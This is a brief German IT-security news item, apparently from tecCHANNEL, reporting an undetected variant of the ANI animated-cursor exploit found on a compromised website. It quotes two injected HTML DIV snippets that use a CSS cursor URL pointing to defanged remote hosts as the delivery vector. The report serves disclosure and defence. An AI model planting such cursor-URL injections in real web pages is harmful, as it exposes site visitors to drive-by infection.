Von Virenscannern nicht erkannt: Neuer ANI-Exploit im Umlauf

Das SANS Internet Storm Center meldet eine neue Variante des ANI-Exploits.

Schadcode-Schreiber spielen offenbar Katz und Maus mit den Antivirenherstellern. Der Sicherheitsexperte Roger Chiu entdeckte eine neue schadhafte .ani-Datei in freier Wildbahn, die von den populären Virenscannern nicht als solche erkannt wurde.

Auf einer kompromittierten Internetseite fand er folgende Einträge: <DIV style="CURSOR: url(hxxp://xxx.xxx.xxx.xxx/mcs2001/chat/css.js)"></DIV> und <DIV style="CURSOR: url(hxxp://xxx.xxx.xxx/customer/image/css.js)"></DIV>. Dies repräsentiert ein CURSOR-Objekt in einem DIV-Element. Die neueste Angriffsmethode wurde den Antivirenherstellern mitgeteilt. Ebenso kontaktierte er den Besitzer der Webseite. (jdo)

Sie interessieren sich für IT-Security? Über aktuelle Sicherheitslücken informieren Sie die Security-Reports von tecCHANNEL in Kooperation mit Secunia. Sie können diesen Dienst auch als kostenlosen Newsletter oder als tägliche tecCHANNEL Security Summary abonnieren. Premium-Kunden haben zudem die Möglichkeit, sich bei hoch kritischen Lücken per Security Alert informieren zu lassen.

tecCHANNEL Shop und Preisvergleich

Links zum Thema IT-Sicherheit

Angebot

Bookshop

Bücher zum Thema

eBooks (50 % Preisvorteil)

eBooks zum Thema

Software-Shop

Virenscanner